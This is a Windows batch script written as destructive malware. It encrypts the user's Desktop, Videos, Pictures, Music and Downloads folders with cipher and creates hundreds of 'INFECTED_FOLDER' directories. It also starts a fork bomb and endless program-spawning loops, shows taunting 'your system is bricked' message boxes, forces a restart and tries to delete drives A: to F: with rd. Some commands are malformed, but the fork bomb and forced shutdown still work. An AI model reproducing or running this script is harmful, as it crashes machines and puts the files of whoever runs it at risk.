@echo off
cd C:\Users\%USERPROFILE%\Desktop
cipher /e
cd C:\Users\%USERPROFILE%\Videos
cipher /e
cd C:\Users\%USERPROFILE\Pictures
cipher /e
cd C:\Users\%USERPROFILE%\Music
cipher /e
cd C:\Users\%USERPROFILE%\Downloads
cipher /e
cd C:\Users\%USERPROFILE%\Desktop
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
md INFECTED_FOLDER%random%
%0|%0
%0|%0
%0|%0
%0|%0
:spam
start cmd
start
start calc
start mspaint
start winver
start explorer
start 
start
goto spam
timeout 3
:1
echo are you scared? (y/n)
set /p input=
if /i %input%==y goto scared
if /i %input%==n goto brave
if not /i %input%==y,n goto 1

:scared
echo.x=msgbox ("you better be because your system is bricked and your files are encrypted",16,"virus.exe")>>msg1.vbs
start msg1.vbs
timeout 2
shutdown -r -t 10 -c Your files are now mine restarting early will also brick the pc
rd A:\ /f /q
rd B:\ /f /q
rd C:\ /f /q
rd D:\ /f /q
rd E:\ /f /q
rd F:\ /f /q

:brave 
echo.x=msgbox("Your brave but im still bricking your PC",16,"im better")>>msg2.vbs
start msg2.vbs
timeout 2
shutdown -r -t 10 -c Bricking your PC LOL RESTARTING EARLY WONT WORK
rd A:\ /f /q
rd B:\ /f /q
rd C:\ /f /q
rd D:\ /f /q
rd E:\ /f /q
rd F:\ /f /q
